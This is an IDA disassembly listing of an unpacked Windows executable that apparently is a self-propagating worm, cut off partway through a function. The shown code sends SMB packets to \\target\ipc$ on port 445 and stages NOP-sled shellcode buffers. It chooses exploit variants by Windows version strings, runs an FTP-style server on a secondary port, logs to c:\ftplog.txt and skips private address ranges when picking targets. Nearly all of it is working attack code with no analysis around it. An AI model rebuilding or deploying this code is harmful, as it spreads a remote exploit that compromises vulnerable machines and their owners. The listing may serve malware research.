;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 85C7FCC1B2ED8E3FD5CA75DF9302D019
; File Name : u:\work\85c7fcc1b2ed8e3fd5ca75df9302d019_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40126C+7C�p
; sub_401F4B:loc_401FC9�p ...
mov eax, dword_4070C0
imul eax, 343FDh
add eax, 279EC3h
mov dword_4070C0, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: WinMain(x,x,x,x)+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4070C0, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: WinMain(x,x,x,x)+11�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call dword_405104
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call dword_405134
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40126C+9C�p
; sub_401F4B+3E�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call dword_40512C
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call dword_405138
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call dword_405130
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401F4B+137�p
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 1BDh
call dword_40511C
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8 ; Size
lea eax, [ebp+var_8]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call dword_405120
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+Dst]
push 10h
push eax
push esi
call dword_405124
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call dword_405128
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40126C+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_405134
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call dword_405138
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401210(char *Str)
sub_401210 proc near ; CODE XREF: sub_401B59+2B5�p
Str = dword ptr 4
inc dword_4070C4
push esi
push 0
push offset aCFtplog_txt ; "c:\\ftplog.txt"
call dword_405028 ; _lcreat
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40126A
push ebx
push edi
push 2
push 0
push esi
call dword_405024 ; _llseek
push [esp+0Ch+Str] ; Str
call _strlen
mov edi, dword_405020
pop ecx
push eax
push [esp+10h+Str]
push esi
call edi ; dword_405020
mov ebx, offset Str ; "\r\n"
push ebx ; Str
call _strlen
pop ecx
push eax
push ebx
push esi
call edi ; dword_405020
push esi
call dword_40501C ; _lclose
pop edi
pop ebx
loc_40126A: ; CODE XREF: sub_401210+19�j
pop esi
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40126C proc near ; CODE XREF: sub_401A69+7B�p
Str = byte ptr -33Ch
var_110 = byte ptr -110h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 3FEh
call dword_40511C
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8 ; Size
lea eax, [ebp+var_8]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 10h
push 6
push 1
push 2
call dword_405120
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012D1
xor al, al
jmp loc_401379
; ---------------------------------------------------------------------------
loc_4012D1: ; CODE XREF: sub_40126C+5C�j
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_405124
cmp eax, 0FFFFFFFFh
jz loc_401370
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset Source
push eax
call dword_405018 ; lstrcpyA
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030
lea eax, [ebp+Str]
push eax
call dword_4050F0 ; wsprintfA
lea eax, [ebp+Str]
xor esi, esi
push eax ; Str
call _strlen
add esp, 1Ch
test eax, eax
jbe short loc_401362
loc_40133E: ; CODE XREF: sub_40126C+F4�j
push ebx
lea eax, [ebp+esi+Str]
push 1
push eax
push edi
call dword_405118
lea eax, [ebp+Str]
inc esi
push eax ; Str
call _strlen
cmp esi, eax
pop ecx
jb short loc_40133E
loc_401362: ; CODE XREF: sub_40126C+D0�j
push 3E8h
call dword_40502C ; Sleep
mov bl, 1
pop esi
loc_401370: ; CODE XREF: sub_40126C+75�j
push edi
call dword_405128
mov al, bl
loc_401379: ; CODE XREF: sub_40126C+60�j
pop edi
pop ebx
leave
retn
sub_40126C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40137D proc near ; CODE XREF: sub_401A69+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
Src = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
Str = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
Dst = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset Source
push [ebp+arg_4]
call dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050F0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013B6: ; CODE XREF: sub_40137D+49�j
mov dl, [ebp+ecx+Str]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013B6
push 60h ; Size
lea eax, [ebp+var_B4]
push offset dword_4063E4 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_84]
push eax ; Dst
call _memcpy
add esp, 1Ch
lea eax, [ebp+Str]
push 9 ; Size
push (offset aC+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
push 1 ; Size
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax ; Src
lea eax, [ebp+var_B1]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
push 1 ; Size
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax ; Src
lea eax, [ebp+var_87]
push eax ; Dst
call _memcpy
add esp, 2Ch
push [ebp+arg_0]
call dword_405138
mov ebx, eax
cmp ebx, edi
jz loc_401539
push edi
push 1
push 2
call dword_405120
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401539
push 1BDh
loc_401493: ; DATA XREF: .text:off_4065D8�o
mov [ebp+var_14], 2
call dword_40511C
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8 ; Size
push edi ; Val
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call dword_405124
cmp eax, 0FFFFFFFFh
jz short loc_401539
mov ebx, dword_405118
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401539
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, dword_405114
call esi ; dword_405114
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401539
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_405114
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; dword_405118
cmp eax, 0FFFFFFFFh
jnz short loc_40153D
loc_401539: ; CODE XREF: sub_40137D+F2�j
; sub_40137D+10B�j ...
xor eax, eax
jmp short loc_40157E
; ---------------------------------------------------------------------------
loc_40153D: ; CODE XREF: sub_40137D+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_405114
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401555: ; CODE XREF: sub_40137D+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call dword_4050F0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401555
push [ebp+arg_0]
call dword_405128
push 1
pop eax
loc_40157E: ; CODE XREF: sub_40137D+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_40137D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401583 proc near ; CODE XREF: sub_401A69+3B�p
; sub_401A69+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
Src = byte ptr -114h
var_113 = byte ptr -113h
Dst = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
Str = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call __alloca_probe
mov eax, dword_406A3C
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A40
mov [ebp+var_10], eax
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050F0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015BD: ; CODE XREF: sub_401583+4A�j
mov dl, [ebp+ecx+Str]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015BD
push ebx
push esi
push edi
push 60h ; Size
lea eax, [ebp+Dst]
push offset dword_4063E4 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
add esp, 1Ch
lea eax, [ebp+Str]
push 9 ; Size
push (offset aC+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
push 1 ; Size
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax ; Src
lea eax, [ebp+var_C1]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
push 1 ; Size
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax ; Src
lea eax, [ebp+var_97]
push eax ; Dst
call _memcpy
add esp, 2Ch
push 3FEh
call dword_40511C
xor eax, 9999h
push 2 ; Size
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax ; Src
push offset dword_4060E4 ; Dst
call _memcpy
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_4016FF
cmp ebx, 2
jz short loc_4016FF
push 7D0h ; Size
lea eax, [ebp+var_F24]
push 90h ; Val
push eax ; Dst
call _memset
mov esi, offset aI ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_E84]
push esi ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push eax ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_14]
push eax ; Src
lea eax, [ebp+var_768]
push eax ; Dst
call _memcpy
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017D3
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: sub_401583+115�j
; sub_401583+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi ; Size
push 90h ; Val
push eax ; Dst
call _memset
imul ebx, 3Ch
push 4 ; Size
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx ; Src
push eax ; Dst
call _memcpy
mov esi, offset aI ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_24C4]
push esi ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_21A0]
push offset dword_406A34 ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_219C]
push ebx ; Src
push eax ; Dst
call _memcpy
add esp, 40h
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_2190]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_40178B: ; CODE XREF: sub_401583+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_40178B
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi ; Size
push 31h ; Val
push eax ; Dst
call _memset
push esi ; Size
lea eax, [ebp+var_68EC]
push 31h ; Val
push eax ; Dst
call _memset
add esp, 18h
loc_4017D3: ; CODE XREF: sub_401583+177�j
push 0
push 1
push 2
call dword_405120
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A62
push 1BDh
mov [ebp+var_24], 2
call dword_40511C
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8 ; Size
lea eax, [ebp+var_1C]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_405124
cmp eax, 0FFFFFFFFh
jz loc_401A62
mov esi, dword_405118
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, dword_405114
call edi ; dword_405114
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
cmp [ebp+arg_4], 1
jz short loc_4019A0
cmp [ebp+arg_4], 2
jz short loc_4019A0
push 7Ch ; Size
lea eax, [ebp+var_1F08]
push offset dword_406558 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_F24]
push 7D0h ; Size
push eax ; Src
lea eax, [ebp+var_1E8C]
push eax ; Dst
call _memcpy
push 90h ; Size
lea eax, [ebp+var_16BC]
push offset off_4065D8 ; Src
push eax ; Dst
call _memcpy
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A43
; ---------------------------------------------------------------------------
loc_4019A0: ; CODE XREF: sub_401583+3B8�j
; sub_401583+3BE�j
push 68h ; Size
lea eax, [ebp+var_89C4]
push offset dword_40666C ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_4814]
push 1B5Ah ; Size
push eax ; Src
lea eax, [ebp+var_895C]
push eax ; Dst
call _memcpy
push 70h ; Size
lea eax, [ebp+var_68EC]
push offset dword_4066D8 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_3780]
push 0A5Eh ; Size
push eax ; Src
lea eax, [ebp+var_687C]
push eax ; Dst
call _memcpy
push 84h ; Size
lea eax, [ebp+var_5DB8]
push offset dword_40674C ; Src
push eax ; Dst
call _memcpy
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A43: ; CODE XREF: sub_401583+418�j
push eax
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401A62
push 3E8h
call dword_40502C ; Sleep
push [ebp+var_4]
call dword_405128
loc_401A62: ; CODE XREF: sub_401583+264�j
; sub_401583+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_401583 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A69 proc near ; CODE XREF: WinMain(x,x,x,x)+27�p
Str = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+Str]
push eax
push esi
call sub_40137D
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401AEA
lea eax, [ebp+Str]
push offset SubStr ; "5.1"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401AAD
push 0
push esi
call sub_401583
push 0
jmp short loc_401ADA
; ---------------------------------------------------------------------------
loc_401AAD: ; CODE XREF: sub_401A69+36�j
lea eax, [ebp+Str]
push offset a5_0 ; "5.0"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401AD0
push 1
push esi
call sub_401583
push 1
jmp short loc_401ADA
; ---------------------------------------------------------------------------
loc_401AD0: ; CODE XREF: sub_401A69+59�j
push 2
push esi
call sub_401583
push 2
loc_401ADA: ; CODE XREF: sub_401A69+42�j
; sub_401A69+65�j
push esi
call sub_401583
add esp, 10h
push esi
call sub_40126C
pop ecx
loc_401AEA: ; CODE XREF: sub_401A69+1F�j
pop esi
leave
retn
sub_401A69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AED proc near ; CODE XREF: sub_40219B+DA�p
; sub_40219B+E6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40500C
test eax, eax
jnz short loc_401B19
push [ebp+arg_8]
push [ebp+arg_4]
call dword_405010
push [ebp+arg_4]
call dword_405000
loc_401B19: ; CODE XREF: sub_401AED+15�j
pop ebp
retn
sub_401AED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B1B proc near ; CODE XREF: sub_401F4B+126�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
call sub_404DA2
push [ebp+arg_4]
mov esi, eax
lea eax, [ebp+var_24]
or [ebp+var_1C], 0FFFFFFFFh
push 24h
push eax
xor eax, eax
push eax
push eax
push eax
push [ebp+arg_0]
push esi
call sub_404D9C
test eax, eax
jnz short loc_401B4D
or eax, 0FFFFFFFFh
jmp short loc_401B56
; ---------------------------------------------------------------------------
loc_401B4D: ; CODE XREF: sub_401B1B+2B�j
push esi
call sub_404D96
mov eax, [ebp+var_1C]
loc_401B56: ; CODE XREF: sub_401B1B+30�j
pop esi
leave
retn
sub_401B1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B59 proc near ; DATA XREF: sub_401EC0+74�o
var_8E4 = byte ptr -8E4h
Str = byte ptr -4E4h
Source = byte ptr -4E0h
Dest = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Dst = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
Delim = byte ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E84
push esi
push edi
push 0
push off_4068D0 ; Str
call _strlen
mov esi, dword_405118
pop ecx
push eax
push off_4068D0
push ebx
call esi ; dword_405118
mov edi, [ebp+arg_0]
jmp short loc_401B97
; ---------------------------------------------------------------------------
loc_401B94: ; CODE XREF: sub_401B59+31A�j
mov ebx, [ebp+arg_0]
loc_401B97: ; CODE XREF: sub_401B59+39�j
push 0
lea eax, [ebp+Str]
push 400h
push eax
push ebx
call dword_405114
and [ebp+eax+Str], 0
mov [ebp+var_10], eax
lea eax, [ebp+Str]
push offset aUser ; "USER"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401BE8
push 0
push off_4068D4 ; Str
call _strlen
pop ecx
push eax
push off_4068D4
jmp loc_401E6C
; ---------------------------------------------------------------------------
loc_401BE8: ; CODE XREF: sub_401B59+73�j
lea eax, [ebp+Str]
push offset aPass ; "PASS"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401C19
push 0
push off_4068D8 ; Str
call _strlen
pop ecx
push eax
push off_4068D8
jmp loc_401E6C
; ---------------------------------------------------------------------------
loc_401C19: ; CODE XREF: sub_401B59+A4�j
lea eax, [ebp+Str]
push offset aPort ; "PORT"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_401CF5
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
mov ax, word_406A68
mov word ptr [ebp+Delim], ax
lea eax, [ebp+Delim]
push eax ; Delim
lea eax, [ebp+Dest]
